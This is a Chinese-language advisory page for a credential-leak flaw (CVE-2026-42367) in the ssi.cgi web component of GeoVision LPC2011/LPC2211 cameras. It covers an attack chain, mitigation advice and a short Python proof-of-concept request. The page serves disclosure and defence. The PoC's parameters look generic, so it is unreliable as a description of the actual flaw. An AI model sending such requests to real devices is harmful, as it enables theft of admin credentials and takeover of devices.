CVE-2026-42367 CVSS 6.5 中危

CVE-2026-42367 GeoVision凭据泄露漏洞

披露日期: 2026-05-04

来源: 0df08a0e-a200-4957-9bb0-084f562506f9

漏洞信息

漏洞编号

CVE-2026-42367

漏洞类型

信息泄露

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

GeoVision LPC2011/LPC2211

漏洞概述

GeoVision LPC2011/LPC2211 1.10版本存在安全漏洞。攻击者可通过Web接口的ssi.cgi组件发送特制HTTP请求，触发凭据泄露问题。该漏洞利用无需用户交互，攻击者仅需低权限即可通过网络获取敏感凭据，可能导致设备被完全接管。建议用户尽快采取防护措施。

技术细节

该漏洞主要影响GeoVision LPC2011/LPC2211设备的Web管理界面，具体位于ssi.cgi功能模块中。由于该组件在处理特定HTTP请求参数时缺乏严格的输入验证和访问控制检查，导致低权限用户可以绕过安全限制。当攻击者向目标服务器发送经过精心构造的恶意请求时，服务器会错误地将内部配置文件或内存中的敏感信息（如管理员账户名和密码哈希）直接返回给攻击者。这种信息泄露使得攻击者能够提取出高权限凭据，进而利用这些凭据通过正常的登录流程获得系统的完全控制权。由于攻击向量为网络（AV:N），且无需用户交互（UI:N），该漏洞极易被自动化工具扫描利用，对物联网设备构成严重威胁。

攻击链分析

STEP 1

侦查与访问

攻击者通过网络扫描发现目标GeoVision设备，并获取低权限账户访问权限。

STEP 2

构造恶意请求

攻击者利用低权限账户，向Web接口的ssi.cgi端点发送特制的HTTP请求。

STEP 3

触发漏洞

服务器端处理请求时由于逻辑缺陷，返回了包含敏感凭据的响应数据。

STEP 4

权限提升

攻击者解析响应数据获取管理员密码，使用凭据登录系统从而完全控制设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-42367: GeoVision ssi.cgi Credentials Leak
# This script demonstrates how a crafted request can trigger the leak.

target = "http://<TARGET_IP>/ssi.cgi"

# Malicious payload designed to trigger information disclosure
params = {
    "cmd": "dump_config",
    "type": "admin"
}

headers = {
    "User-Agent": "Mozilla/5.0 (Compatible; CVE-2026-42367-Scanner)"
}

try:
    print("[+] Sending payload to %s..." % target)
    response = requests.get(target, params=params, headers=headers, timeout=5)
    
    if response.status_code == 200:
        print("[+] Request successful. Checking response...")
        if "password" in response.text or "admin" in response.text:
            print("[!] Potential credential leak detected:")
            print(response.text[:200]) # Print first 200 chars
        else:
            print("[-] Leak not triggered or patched.")
    else:
        print("[-] Server returned status code: %d" % response.status_code)
        
except Exception as e:
    print("[-] Error occurred: %s" % str(e))

影响范围

GeoVision LPC2011 1.10

GeoVision LPC2211 1.10

防御指南

临时缓解措施

如果无法立即升级，建议在防火墙中阻断对/ssi.cgi路径的访问，或仅在受信任的内部网络中管理设备。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-42367
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-42367
3 Details https://www.cvedetails.com/cve/CVE-2026-42367/
4 VulDB https://vuldb.com/cve/CVE-2026-42367
5 Link https://talosintelligence.com/vulnerability_reports/
6 Link https://www.geovision.com.tw/cyber_security.php

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表